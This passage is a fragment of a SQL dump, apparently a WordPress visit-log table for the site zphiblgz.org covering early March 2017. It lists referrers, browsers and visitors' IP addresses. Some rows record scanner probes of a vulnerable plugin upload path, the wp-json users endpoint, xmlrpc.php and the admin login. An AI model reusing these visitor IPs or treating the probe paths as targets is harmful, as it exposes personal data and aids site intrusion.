Fire','56.2.4','','98.117.45.181','000',1,0),(1574,'2017-03-04','http://zphiblgz.org/wp-json/wp/v2/users/','MSIE','Windows','6.0','','185.145.253.91','000',1,0),(1575,'2017-03-04','http://zphiblgz.org','Safari','iPhone','10.0','','50.164.59.70','000',5,0),(1576,'2017-03-04','http://zphiblgz.org','Safari','iPhone','10.0','','173.73.80.24','000',2,0),(1577,'2017-03-04','http://zphiblgz.org/scholarship/','Chrome','Windows','56.0.2924.87','','68.134.22.152','000',1,0),(1578,'2017-03-04','http://zphiblgz.org','Firefox','Windows','3.6.3','','52.13.7.163','000',1,0),(1579,'2017-03-04','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','185.7.215.84','000',2,0),(1580,'2017-03-04','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1350.9kLnQqHn07guKY_76NMkUNAsvKE48kgEud--imcs7JU9EM0jeO1KFg5E8UkVAS64.dcf65d163a3e71211b9a64afc3f86a333bf8d279&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YKCJkrjchpDstTwxTkjwGrA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWS0JicUkwNmNqY3J3YVdRaHBMM1daU05ERmNYN3k2WGg2enFpekNYUTN3UnhuVXhEVlo0R1ly&b64e=2&sign=371772f792bd6f21cbe8b84e579e951a&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQXbYQp9t5VF6_fDqX3u3CwL9u2mF9j5OPhAr2bpUddgxQ9kCv3DlPuFu3flZsArMXCBRCQIloN8LIacBLsFt5SINlpvslj767s5mzU52x8a11tldzigCeNmgrPz7b3RgGKg9nv-S2B1b&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXWw0iTWKpk3EcrM_3-97T4O5cAhT_oeMn5G1RS9_fHmDwDekHEJfvBbZsBWchWJVQ-tWTwkHSDcw&l10n=ru&cts=1488677907416&mc=5.7420981903','MSIE','Windows','10.0','','109.63.243.62','000',1,0),(1581,'2017-03-04','http://zphiblgz.org/modules/attributewizardpro/file_upload.php','Chrome','Windows','42.0.2311.152','','51.15.10.29','000',1,0),(1582,'2017-03-04','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','96.234.210.155','000',6,0),(1583,'2017-03-04','https://www.google.com/','Chrome','Windows','56.0.2924.87','','108.48.60.106','000',2,0),(1584,'2017-03-05','http://zphiblgz.org','Firefox','Windows','28.0','','23.81.233.65','000',2,0),(1585,'2017-03-05','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.113','000',1,0),(1586,'2017-03-05','http://zphiblgz.org','Firefox','Linux','5.0','','31.132.79.19','000',1,0),(1587,'2017-03-05','http://zphiblgz.org','Firefox','Windows','29.0','','178.35.147.210','000',2,0),(1588,'2017-03-05','http://zphiblgz.org','Chrome','Windows','48.0.2564.116','','91.250.15.107','000',1,0),(1589,'2017-03-05','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','100.16.228.190','000',24,0),(1590,'2017-03-05','https://www.google.com/','Chrome','Macintosh','56.0.2924.87','','173.59.236.149','000',3,0),(1591,'2017-03-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','188.121.41.118','000',1,0),(1592,'2017-03-05','https://www.google.com/','Safari','iPad','10.0','','68.134.24.114','000',2,0),(1593,'2017-03-05','http://zphiblgz.org','Safari','Macintosh','6.0.3','','5.9.112.6','000',1,0),(1594,'2017-03-05','http://zphiblgz.org/','Firefox','Windows','43.0','','83.217.8.235','000',1,0),(1595,'2017-03-05','http://zphiblgz.org','Safari','iPhone','10.0','','173.69.144.23','000',2,0),(1596,'2017-03-05','http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarships&h=ATNIZayDWOyhCSvSQ1AksaYdckTzg6hL9eG-U_sHD90wVPYL66DItq0aYgsXTpkmjqlfZj6Pb8xlL_ILxqU4cu8dccGRi_Teui9PtdQYxQXdW6ZcRwQ0Rw','Edge','Windows','14.14393','','66.220.145.244','000',2,0),(1597,'2017-03-05','http://zphiblgz.org','Firefox','Windows','40.1','','121.122.16.49','000',1,0),(1598,'2017-03-05','https://www.google.com/','Safari','iPhone','10.0','','208.54.86.245','000',2,0),(1599,'2017-03-05','https://www.google.com/','Chrome','Android','34.0.1847.76','','96.234.245.108','000',1,0),(1600,'2017-03-05','http://zphiblgz.org','Edge','Windows','14.14393','','73.213.22.160','000',15,0),(1601,'2017-03-05','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Chrome','Windows','26.0.1410.64','','5.61.35.44','000',1,0),(1602,'2017-03-05','http://zphiblgz.org/wp-admin/','Firefox','Windows','14.0.1','','5.61.35.44','000',1,0),(1603,'2017-03-05','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','96.234.210.155','000',1,0),(1604,'2017-03-05','https://www.google.com/','Safari','iPhone','9.0','','23.251.76.216','000',2,0),(1605,'2017-03-05','http://zphiblgz.org','MSIE','Windows','6.0','','89.28.24.190','000',1,0),(1606,'2017-03-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(1607,'2017-03-05','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(1608,'2017-03-05','http://zphiblgz.org','Firefox','Windows','46.0','','192.198.95.90','000',2,0),(1609,'2017-03-05','https://www.google.com/','Chrome','Windows','56.0.2924.87','','99.99.46.230','000',3,0),(1610,'2017-03-05','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','209.95.166.242','000',1,0),(1611,'2017-03-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.58','000',14,0),(1612,'2017-03-05','http://zphiblgz.org/','Chrome','Chrome OS','39.0.2171.96','','111.248.131.4','000',1,0),(1613,'2017-03-05','http://zphiblgz.org/','Opera','Windows','12.17','','116.251.210.172','000',7,0),(1614,'2017-03-05','http://zphiblgz.org/','PHP','Unknown','5.2.31','','116.251.210.172','000',1,0),(1615,'2017-03-05','http://zphiblgz.org','Firefox','Windows','40.1','','180.191.143.82','000',2,0),(1616,'2017-03-05','http://zphiblgz.org','Chrome','Android','51.0.2704.81','','173.46.77.144','000',9,0),(1617,'2017-03-05','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.164.2','000',1,0),(1618,'2017-03-05','https://www.google.com/','Safari','iPhone','600.1.4','','104.34.153.129','000',1,0),(1619,'2017-03-05','http://zphiblgz.org','Firefox','Windows','40.1','','99.123.54.183','000',1,0),(1620,'2017-03-06','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',4,0),(1621,'2017-03-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','167.114.174.95','000',15,0),(1622,'2017-03-06','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','167.114.174.95','000',1,0),(1623,'2017-03-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.201.59.34','000',1,0),(1624,'2017-03-06','http://zphiblgz.org','Firefox','Windows','220','','218.30.103.81','000',1,0),(1625,'2017-03-06','http://zphiblgz.org','Firefox','Windows','40.1','','212.93.115.122','000',1,0),(1626,'2017-03-06','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.214','000',1,0),(1627,'2017-03-06','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.179.165.166','000',1,0),(1628,'2017-03-06','zphiblgz.org','Chrome','Windows','50.0.2661.75','','106.187.49.137','000',5,0),(1629,'2017-03-06','http://zphiblgz.org','Firefox','Windows','40.1','','62.211.133.249','000',2,0),(1630,'2017-03-06','http://zphiblgz.org','Firefox','Windows','40.1','','122.164.121.173','000',1,0),(1631,'2017-03-06','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','163.172.52.168','000',2,0),(1632,'2017-03-06','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','65.47.149.110','000',9,0),(1633,'2017-03-06','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(1634,'2017-03-06','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','100.36.97.80','000',3,0),(1635,'2017-03-06','https://www.google.com/','Chrome','Windows','56.0.2924.87','','162.99.225.11','000',13,0),(1636,'2017-03-06','http://zphiblgz.org','Firefox','Windows','40.1','','47.11.134.32','000',1,0),(1637,'2017-03-06','https://www.google.com/','Chrome','Android','56.0.2924.87','','64.233.172.144','000',1,0),(1638,'2017-03-06','https://www.google.com/','Chrome','Android','43.0.2357.121','','12.23.37.34','000',1,0),(1639,'2017-03-06','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwihrdymv8LSAhWEQiYKHUOIDk8QFggjMAA&url=http%3A%2F%2Fzphiblgz.org%2F&usg=AFQjCNHl6iFFa_3VuMKJmTgYMIkup1fP8Q&sig2=4IOgUOm3jj-KdvuAI4EWZQ&bvm=bv.148747831,d.eWE','MSIE','Windows','11.0','','167.102.157.170','000',5,0),(1640,'2017-03-06','http://zphiblgz.org','Firefox','Windows','40.1','','205.197.219.70','000',1,0),(1641,'2017-03-06','http://zphiblgz.org/wp-cron.php?doing_wp_cron=1488826990.9359459877014160156250','WordPress','Unknown','4.7.2','','74.220.219.51','000',1,0),(1642,'2017-03-06','https://www.google.com/','Chrome','Windows','56.0.2924.87','','50.234.115.104','000',3,0),(1643,'2017-03-06','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.86','000',2,0),(1644,'2017-03-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(1645,'2017-03-06','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(1646,'2017-03-06','http://zphiblgz.org','MSIE','Windows','11.0','','204.126.132.241','000',2,0),(1647,'2017-03-06','http://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.123','000',1,0),(1648,'2017-03-06','http://w3data.co/profile.php?lookup=zphiblgz.org','Chrome','Windows','40.0.2214.115','','104.156.230.231','000',1,0),(1649,'2017-03-06','http://zphiblgz.org','Edge','Windows','14.14393','','100.36.97.80','000',5,0),(1650,'2017-03-06','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','108.48.105.39','000',12,0),(1651,'2017-03-06','http://zphiblgz.org','Chrome','Macintosh','46.0.2490.86','','96.244.100.67','000',5,0),(1652,'2017-03-06','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','96.234.210.155','000',1,0),(1653,'2017-03-06','android-app://com.google.android.googlequicksearchbox/https/www.google.com','Chrome','Android','56.0.2924.87','','172.58.185.150','000',2,0),(1654,'2017-03-06','https://www.google.com/','Safari','iPhone','10.0','','108.51.20.201','000',1,0),(1655,'2017-03-06','http://zphiblgz.org','Edge','Windows','14.14393','','73.213.22.160','000',5,0),(1656,'2017-03-06','http://zphiblgz.org','Firefox','Windows','31.0','','208.90.57.196','000',2,0),(1657,'2017-03-06','android-app://com.google.android.googlequicksearchbox/https/www.google.com','Chrome','Android','56.0.2924.87','','96.255.162.155','000',1,0),(1658,'2017-03-07','http://zphiblgz.org','Safari','Macintosh','9.1.3','','108.18.105.96','000',1,0),(1659,'2017-03-07','http://zphiblgz.org/scholarship/','Chrome','Windows','56.0.2924.87','','68.134.22.152','000',1,0),(1660,'2017-03-07','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.88.203','000',2,0),(1661,'2017-03-07','zphiblgz.org','Chrome','Windows','50.0.2661.75','','176.31.156.215','000',2,0),(1662,'2017-03-07','zphiblgz.org','Chrome','Windows','50.0.2661.75','','195.154.85.68','000',2,0),(1663,'2017-03-07','http://zphiblgz.org','Firefox','Windows','40.1','','93.86.184.210','000',2,0),(1664,'2017-03-07','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','38.100.21.84','000',1,0),(1665,'2017-03-07','http://zphiblgz.org','Safari','Macintosh','5.0.5','','52.8.102.96','000',2,0),(1666,'2017-03-07','http://zphiblgz.org','Firefox','Windows','51.0','','50.225.39.91','000',4,0),(1667,'2017-03-07','http://zphiblgz.org/','MSIE','Windows','6.0','','178.90.228.86','000',1,0),(1668,'2017-03-07','zphiblgz.org','Chrome','Windows','50.0.2661.75','','45.55.56.22','000',1,0),(1669,'2017-03-07','http://zphiblgz.org','Firefox','Windows','39.0','','195.22.127.195','000',2,0),(1670,'2017-03-07','zphiblgz.org','Chrome','Windows','50.0.2661.75','','185.12.94.185','000',1,0),(1671,'2017-03-07','zphiblgz.org','Chrome','Windows','50.0.2661.75','','104.131.13.35','000',3,0),(1672,'2017-03-07','zphiblgz.org','Chrome','Windows','50.0.2661.75','','38.109.218.50','000',1,0),(1673,'2017-03-07','http://zphiblgz.org','Firefox','Windows','46.0','','50.225.39.91','000',1,0),(1674,'2017-03-07','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','96.234.210.155','000',10,0),(1675,'2017-03-07','http://zphiblgz.org','Safari','Macintosh','9.0.3','','50.225.39.92','000',1,0),(1676,'2017-03-07','http://zphiblgz.org','Firefox','Windows','51.0','','204.126.132.241','000',2,0),(1677,'2017-03-07','https://www.google.com/','Chrome','Windows','56.0.2924.87','','104.129.194.134','000',6,0),(1678,'2017-03-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',6,0),(1679,'2017-03-07','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(1680,'2017-03-07','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.66','000',1,0),(1681,'2017-03-07','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.79','000',11,0),(1682,'2017-03-07','http://zphiblgz.org','Firefox','Windows','40.1','','168.181.91.15','000',2,0),(1683,'2017-03-07','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.244.203.100','000',1,0),(1684,'2017-03-07','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','104.129.194.127','000',4,0),(1685,'2017-03-07','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.179.98.218','000',6,0),(1686,'2017-03-07','http://zphiblgz.org','Edge','Windows','14.14393','','72.81.227.12','000',1,0),(1687,'2017-03-07','http://zphiblgz.org','Firefox','Windows','40.1','','176.33.214.126','000',2,0),(1688,'2017-03-07','https://www.google.com/','Chrome','Macintosh','46.0.2490.86','','96.244.100.67','000',10,0),(1689,'2017-03-07','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','10.0','','5.61.34.51','000',1,0),(1690,'2017-03-07','http://zphiblgz.org/wp-admin/','Firefox','Windows','14.0.1','','5.61.34.51','000',1,0),(1691,'2017-03-07','http://zphiblgz.org','Microsoft','Unknown','Unknown','','158.74.35.10','000',1,0),(1692,'2017-03-07','http://zphiblgz.org','MSIE','Windows','7.0','','158.74.35.10','000',1,0),(1693,'2017-03-08','https://www.google.com/','Chrome','Windows','56.0.2924.87','','174.28.197.90','000',3,0),(1694,'2017-03-08','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(1695,'2017-03-08','http://zphiblgz.org','Firefox','Windows','40.1','','178.149.69.149','000',1,0),(1696,'2017-03-08','http://zphiblgz.org','Wget','Linux','1.16','','185.145.253.183','000',2,0),(1697,'2017-03-08','http://zphiblgz.org','Chrome','Windows','52.0.2743.116','','144.217.80.113','000',1,0),(1698,'2017-03-08','http://zphiblgz.org','Firefox','Linux','34.0','','94.249.224.137','000',1,0),(1699,'2017-03-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','66.147.244.218','000',2,0),(1700,'2017-03-08','http://zphiblgz.org','Firefox','Windows','40.1','','177.103.201.249','000',1,0),(1701,'2017-03-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.55','000',1,0),(1702,'2017-03-08','http://zphiblgz.org','Firefox','Linux','34.0','','5.230.133.154','000',1,0),(1703,'2017-03-08','http://zphiblgz.org','Opera','Windows','12.17','','5.230.133.154','000',4,0),(1704,'2017-03-08','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',1,0),(1705,'2017-03-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','88.99.144.230','000',1,0),(1706,'2017-03-08','http://zphiblgz.org','MSIE','Windows','8.0','','5.188.211.244','000',1,0),(1707,'2017-03-08','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(1708,'2017-03-08','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','96.234.210.155','000',1,0),(1709,'2017-03-08','http://zphiblgz.org','Microsoft','Unknown','Unknown','','204.126.132.241','000',2,0),(1710,'2017-03-08','http://zphiblgz.org','MSIE','Windows','7.0','','204.126.132.241','000',2,0),(1711,'2017-03-08','http://zphiblgz.org','MSIE','Windows','11.0','','204.126.132.241','000',4,0),(1712,'2017-03-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','5.9.156.154','000',2,0),(1713,'2017-03-08','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','149.79.50.1','000',1,0),(1714,'2017-03-08','http://zphiblgz.org','Firefox','Windows','51.0','','204.126.132.241','000',6,0),(1715,'2017-03-08','https://www.google.com/','Chrome','Chrome OS','55.0.2883.105','','205.222.248.133','000',1,0),(1716,'2017-03-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(1717,'2017-03-08','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(1718,'2017-03-08','http://zphiblgz.org','Firefox','Windows','31.0','','208.90.57.196','000',2,0),(1719,'2017-03-08','https://www.google.com','Firefox','Windows','44.0','','66.192.207.194','000',1,0),(1720,'2017-03-08','http://www.timer4web.com/domain/zphiblgz.org','Chrome','Windows','51.0.2704.103','','85.10.211.154','000',1,0),(1721,'2017-03-08','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','75.119.200.142','000',1,0),(1722,'2017-03-08','https://www.google.com/','Chrome','Windows','56.0.2924.87','','69.140.141.237','000',11,0),(1723,'2017-03-08','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.163.160.129','000',1,0),(1724,'2017-03-08','https://www.google.com/','Firefox','Macintosh','51.0','','68.33.94.131','000',4,0),(1725,'2017-03-08','http://zphiblgz.org','Firefox','Windows','3.6.28','','173.234.225.202','000',1,0),(1726,'2017-03-08','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.115','000',1,0),(1727,'2017-03-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.123','000',1,0),(1728,'2017-03-08','http://zphiblgz.org','Firefox','Windows','52.0','','76.100.15.116','000',5,0),(1729,'2017-03-08','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',5,0),(1730,'2017-03-08','http://zphiblgz.org','Firefox','Windows','40.1','','182.53.73.77','000',3,0),(1731,'2017-03-09','http://zphiblgz.org/lgz-celebrates-35-years-service-howard-county-md/','MSIE','Windows','6.0','','31.184.236.55','000',1,0),(1732,'2017-03-09','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.80.1','000',1,0),(1733,'2017-03-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','96.39.224.253','000',1,0),(1734,'2017-03-09','http://zphiblgz.org','Firefox','Windows','40.1','','89.205.125.235','000',2,0),(1735,'2017-03-09','http://zphiblgz.org/','Chrome','Windows','44.0.2403.125','','62.212.73.49','000',1,0),(1736,'2017-03-09','http://zphiblgz.org','Firefox','Windows','40.1','','122.255.62.148','000',2,0),(1737,'2017-03-09','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',4,0),(1738,'2017-03-09','http://zphiblgz.org/mail/logo_img.php','Chrome','Windows','42.0.2311.152','','163.172.52.168','000',2,0),(1739,'2017-03-09','http://zphiblgz.org','Chrome','Windows','29.0.1547.62','','35.167.90.98','000',1,0),(1740,'2017-03-09','http://zphiblgz.org','Firefox','Windows','40.1','','169.149.131.243','000',2,0),(1741,'2017-03-09','http://zphiblgz.org','Firefox','Windows','40.1','','81.5.102.120','000',2,0),(1742,'2017-03-09','http://zphiblgz.org','MSIE','Windows','8.0','','64.235.153.11','000',2,0),(1743,'2017-03-09','http://zphiblgz.org','Edge','Windows','14.14393','','174.205.20.135','000',4,0),(1744,'2017-03-09','https://www.google.com/','Chrome','Windows','56.0.2924.87','','141.161.30.220','000',2,0),(1745,'2017-03-09','http://zphiblgz.org','Firefox','Windows','40.1','','197.116.94.169','000',1,0),(1746,'2017-03-09','http://zphiblgz.org','Firefox','Windows','51.0','','204.126.132.241','000',6,0),(1747,'2017-03-09','http://zphiblgz.org','Firefox','Windows','1.0.7','','52.11.15.212','000',1,0),(1748,'2017-03-09','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','208.76.113.3','000',2,0),(1749,'2017-03-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',2,0),(1750,'2017-03-09','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',3,0),(1751,'2017-03-09','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.45.183','000',1,0),(1752,'2017-03-09','http://zphiblgz.org','Firefox','Macintosh','27.0','','88.99.68.199','000',1,0),(1753,'2017-03-09','http://zphiblgz.org','Firefox','Windows','29.0','','23.80.142.223','000',2,0),(1754,'2017-03-09','http://zphiblgz.org','Firefox','Windows','40.1','','192.161.108.195','000',2,0),(1755,'2017-03-09','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjMv6eZiMbSAhXERyYKHYGnDJQQFggaMAA&url=http%3A%2F%2Fzphiblgz.org%2F&usg=AFQjCNHl6iFFa_3VuMKJmTgYMIkup1fP8Q','MSIE','Windows','11.0','','107.214.154.63','000',1,0),(1756,'2017-03-10','http://zphiblgz.org','Safari','iPhone','6.0','','218.30.103.81','000',1,0),(1757,'2017-03-10','http://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','54.202.35.207','000',2,0),(1758,'2017-03-10','https://www.google.com/','Safari','iPhone','10.0','','98.233.170.205','000',2,0),(1759,'2017-03-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','173.208.169.42','000',1,0),(1760,'2017-03-10','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(1761,'2017-03-10','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Safari','iPad','5.1','','5.61.34.51','000',1,0),(1762,'2017-03-10','http://zphiblgz.org/wp-admin/','Chrome','Windows','24.0.1312.57','','5.61.34.51','000',1,0),(1763,'2017-03-10','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(1764,'2017-03-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','52.41.27.53','000',1,0),(1765,'2017-03-10','http://zphiblgz.org','Firefox','Windows','1.0.7','','52.34.147.7','000',1,0),(1766,'2017-03-10','http://zphiblgz.org','Chrome','Windows','49.0.2623.112','','50.225.39.86','000',4,0),(1767,'2017-03-10','http://zphiblgz.org','Firefox','Windows','51.0','','204.126.132.241','000',5,0),(1768,'2017-03-10','https://www.google.com/','Safari','Macintosh','9.1.1','','168.221.159.9','000',3,0),(1769,'2017-03-10','https://www.google.com/','Chrome','Macintosh','56.0.2924.87','','24.33.137.77','000',1,0),(1770,'2017-03-10','http://zphiblgz.org','Safari','iPhone','10.0','','73.213.165.227','000',1,0),(1771,'2017-03-10','zphiblgz.org','Chrome','Windows','50.0.2661.75','','166.78.7.234','000',4,0),(1772,'2017-03-10','http://zphiblgz.org','Firefox','Windows','40.1','','148.56.111.98','000',1,0),(1773,'2017-03-10','https://www.google.com/','Chrome','Windows','56.0.2924.87','','23.30.3.69','000',1,0),(1774,'2017-03-10','zphiblgz.org','Chrome','Windows','50.0.2661.75','','162.13.88.176','000',1,0),(1775,'2017-03-10','zphiblgz.org','Chrome','Windows','50.0.2661.75','','187.33.5.110','000',1,0),(1776,'2017-03-10','zphiblgz.org','Chrome','Windows','50.0.2661.75','','162.243.46.139','000',1,0),(1777,'2017-03-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(1778,'2017-03-10','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(1779,'2017-03-10','http://r.search.yahoo.com/_ylt=AwrBT0cxI8NY5LQAAa9XNyoA;_ylu=X3oDMTEyZGV2OHI0BGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjM2MDRfMQRzZWMDc3I-/RV=2/RE=1489212338/RO=10/RU=http%3a%2f%2fzphiblgz.org%2f/RK=0/RS=pqF2BCUT7zifycvTm3UQhIievyo-','MSIE','Windows','11.0','','166.67.66.245','000',1,0),(1780,'2017-03-10','https://www.google.com/','Chrome','Android','51.0.2704.106','','172.58.184.211','000',1,0),(1781,'2017-03-10','http://zphiblgz.org','Firefox','Windows','40.1','','183.83.39.251','000',2,0),(1782,'2017-03-10','https://www.google.com/','Chrome','Windows','56.0.2924.87','','108.48.60.106','000',2,0),(1783,'2017-03-10','http://zphiblgz.org','Chrome','Windows','6.0','','176.53.23.243','000',1,0),(1784,'2017-03-11','http://zphiblgz.org/','Opera Next','Windows','34.0.2036.50','','37.147.209.52','000',4,0),(1785,'2017-03-11','http://zphiblgz.org','Firefox','Windows','40.1','','212.253.66.53','000',2,0),(1786,'2017-03-11','http://zphiblgz.org/xmlrpc.php','Chrome','Windows','53.0.2785.143','','156.197.208.219','000',1,0),(1787,'2017-03-11','http://zphiblgz.org','Firefox','Windows','40.1','','41.87.179.173','000',2,0),(1788,'2017-03-11','http://zphiblgz.org','Firefox','Windows','40.1','','104.199.108.88','000',2,0),(1789,'2017-03-11','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','204.126.132.241','000',5,0),(1790,'2017-03-11','http://zphiblgz.org','Firefox','Windows','40.1','','43.227.132.9','000',2,0),(1791,'2017-03-11','http://zphiblgz.org','Firefox','Windows','40.1','','172.75.228.34','000',2,0),(1792,'2017-03-11','http://zphiblgz.org','Safari','iPhone','10.0','','174.200.4.170','000',7,0),(1793,'2017-03-11','https://www.google.com/','Firefox','Macintosh','49.0','','174.204.9.27','000',4,0),(1794,'2017-03-11','http://zphiblgz.org','Firefox','Windows','40.1','','78.58.232.74','000',2,0),(1795,'2017-03-11','http://zphiblgz.org','Firefox','Windows','40.1','','5.44.169.46','000',1,0),(1796,'2017-03-11','http://zphiblgz.org','Firefox','Windows','5.0.1','','46.229.170.197','000',1,0),(1797,'2017-03-11','http://zphiblgz.org','Firefox','Windows','4.0b11pre','','46.229.170.197','000',1,0),(1798,'2017-03-11','http://zphiblgz.org','HEADMasterSEO','Unknown','Unknown','','176.15.114.33','000',1,0),(1799,'2017-03-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',48,0),(1800,'2017-03-11','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',7,0),(1801,'2017-03-11','http://zphiblgz.org/photos/','Chrome','Windows','48.0.2564.103','','77.51.122.234','000',2,0),(1802,'2017-03-11','http://zphiblgz.org/photos/','Chrome','Windows','48.0.2564.103','','118.254.9.152','000',2,0),(1803,'2017-03-11','http://zphiblgz.org/photos/','Chrome','Windows','48.0.2564.103','','118.254.9.151','000',1,0),(1804,'2017-03-11','http://zphiblgz.org/photos/','Chrome','Windows','48.0.2564.103','','188.255.35.20','000',1,0),(1805,'2017-03-11','http://zphiblgz.org/photos/','Chrome','Windows','48.0.2564.103','','67.66.138.142','000',2,0),(1806,'2017-03-11','http://zphiblgz.org/photos/','Chrome','Windows','48.0.2564.103','','188.162.168.191','000',1,0),(1807,'2017-03-11','http://zphiblgz.org/photos/','Chrome','Windows','48.0.2564.103','','52.220.196.213','000',1,0),(1808,'2017-03-11','http://zphiblgz.org/photos/','Chrome','Windows','48.0.2564.103','','51.15.41.74','000',1,0),(1809,'2017-03-11','http://zphiblgz.org/photos/','Chrome','Windows','48.0.2564.103','','12.183.57.71','000',1,0),(1810,'2017-03-11','http://zphiblgz.org/photos/','Chrome','Windows','48.0.2564.103','','221.180.170.5','000',1,0),(1811,'2017-03-11','https://www.google.com/','Chrome','Windows','56.0.2924.87','','108.48.105.39','000',4,0),(1812,'2017-03-11','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','174.57.68.94','000',2,0),(1813,'2017-03-11','http://zphiblgz.org','Safari','iPhone','10.0','','172.56.14.197','000',1,0),(1814,'2017-03-11','http://zphiblgz.org','Firefox','Linux','33.0','','178.235.18.240','000',1,0),(1815,'2017-03-11','http://zphiblgz.org','Chrome','Windows','37.0.2049.0','','178.235.18.240','000',1,0),(1816,'2017-03-11','http://zphiblgz.org','Safari','iPad','10.0','','173.73.80.24','000',1,0),(1817,'2017-03-11','http://zphiblgz.org','Firefox','Windows','40.1','','52.91.200.215','000',2,0),(1818,'2017-03-11','http://zphiblgz.org','Chrome','Linux','12.0.742.112','','192.95.29.116','000',2,0),(1819,'2017-03-11','https://www.google.com/','Safari','Macintosh','9.1.2','','76.99.104.76','000',3,0),(1820,'2017-03-12','https://www.google.com/','Safari','iPhone','10.0','','72.196.195.157','000',2,0),(1821